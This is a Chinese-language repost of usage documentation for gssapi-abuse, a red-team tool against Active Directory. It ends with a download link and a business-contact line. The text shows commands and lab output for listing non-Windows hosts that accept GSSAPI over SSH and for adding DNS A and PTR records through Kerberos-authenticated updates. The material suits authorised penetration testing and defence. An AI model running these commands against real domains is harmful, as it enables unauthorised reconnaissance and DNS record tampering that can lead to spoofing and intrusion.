枚举模式将连接到 Active Directory,并对没有该单词的所有计算机执行 LDAP 搜索 Windows
在“操作系统”属性中。
获取非 Windows 计算机列表后,gssapi-abuse 将尝试通过 SSH 连接到每个主机,并确定是否允许基于 GSSAPI 的身份验证。
python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
[=] Found 2 non Windows machines registered within AD
[!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
[+] Host centos.ad.ginge.com has GSSAPI enabled over SSH
DNS 模式利用 Kerberos 和 dnspython 使用 DNS-TSIG 协议通过端口 53 执行经过身份验证的 DNS 更新。现在 dns
模式依赖于有效的 krb5 配置,该配置具有针对特定域控制器的有效 TGT 或 DNS 服务票证,例如 DNS/dc1.victim.local
。
添加 DNS A
主机记录 ahost.ad.ginge.com
python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding A record for target ahost using data 192.168.128.50
[+] Applied 1 updates successfully
添加反向 PTR
主机记录 ahost.ad.ginge.com
。请注意, data
参数以 .
,这很重要,否则记录将成为我们不希望看到的区域的相对记录。我们还需要指定要更新的目标区域,因为 PTR
记录存储在不同的区域中,以 A
记录。
python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
[+] Applied 1 updates successfully
执行后的正向和反向DNS查找结果
nslookup ahost.ad.ginge.com
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1
Name: ahost.ad.ginge.com
Address: 192.168.128.50
下载地址:https://github.com/CCob/gssapi-abuse
欢迎添加微信进行业务咨询: 承接以下业务: